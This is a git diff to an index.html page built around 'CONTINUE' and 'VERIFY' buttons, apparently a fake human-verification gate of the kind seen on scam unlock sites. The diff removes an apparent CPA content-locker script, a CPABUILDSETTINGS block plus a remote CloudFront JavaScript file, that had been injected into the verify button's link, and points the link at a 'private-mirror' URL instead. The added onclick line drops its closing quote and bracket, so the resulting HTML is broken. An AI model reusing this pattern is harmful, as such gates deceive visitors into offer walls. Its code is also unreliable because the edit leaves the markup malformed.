--- a/index.html
+++ b/index.html
@@ -77,7 +77,7 @@
 
                     </div>
 
-                    <img src="CONTINUE-b.png" class="img-fluid w-60 ctn2 mt-2 ACH" onclick="afterchoose();">
+                    <img src="CONTINUE-b.png" class="img-fluid w-60 ctn2 mt-2 ACH" onclick="afterchoose();
 
                     <h3 class="console-font tn chend"></h3>
 
@@ -85,10 +85,7 @@
     display: block;
     margin-left: auto;
     margin-right: auto;
-    width: 50%;" id="verify-button" href="<script type="text/javascript">
-    var CPABUILDSETTINGS={"it":3193577,"key":"2a1ab"};
-</script>
-<script src="https://d115fsoldgezur.cloudfront.net/af470f7.js"></script>"> <img src="VERIFY-y.png" class="img-fluid hv"> </a>
+    width: 50%;" id="verify-button" href="https://private-mirror.com/1c615d7"> <img src="VERIFY-y.png" class="img-fluid hv"> </a>
 
                   </div>
 
